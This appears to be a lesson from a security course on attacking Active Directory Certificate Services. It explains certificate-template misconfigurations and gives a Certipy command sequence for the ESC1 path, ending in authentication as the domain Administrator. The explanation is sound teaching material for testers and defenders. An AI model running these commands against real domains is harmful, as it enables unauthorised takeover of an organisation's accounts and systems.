Module 6 · ADCS — ESC1 through ESC16 🔒

Active Directory Certificate Services (ADCS) is Microsoft’s enterprise PKI. It issues certificates for user authentication, server TLS, code signing, and SMIME. It’s deployed in most enterprises that use AD. In 2021, SpecterOps published “Certified Pre-Owned,” which catalogued eight attack paths against misconfigured ADCS — ESC1 through ESC8. Most of them remain findable in 2026 because the misconfigurations are operational defaults, not bugs.

Why ADCS is attack-rich

ADCS allows certificate templates to specify who can request what kind of cert for what purpose. Templates have:

• Enroll permissions (who can request)
• Application Policies (what the cert is used for — Client Authentication, Server Authentication, etc.)
• Subject Alternate Name (SAN) options (whether the requester can supply arbitrary SAN)
• Manager approval requirements
• Cert lifetime

Small configuration errors enable privilege escalation. Specifically, if a template allows low-privilege users to enroll for Client Authentication certs with attacker-supplied SAN, the attacker can request a cert with Administrator’s name in the SAN and authenticate as Administrator.

The ESC catalog

Certified Pre-Owned catalogued 8 attack classes. Brief overview:

# Enumerate vulnerable templates with Certipy
certipy find -u alice@corp.local -p 'Password1' -dc-ip 10.1.1.1 -vulnerable

# Output shows: VulnerableCertTemplate allows low-priv users
# Client Authentication + user-supplied SAN

# Request cert for Administrator
certipy req -u alice@corp.local -p 'Password1' -ca CORP-CA \
    -template VulnerableCertTemplate -upn administrator@corp.local

# Authenticate as Administrator with the cert
certipy auth -pfx administrator.pfx -dc-ip 10.1.1.1
# Output: TGT for Administrator → full DA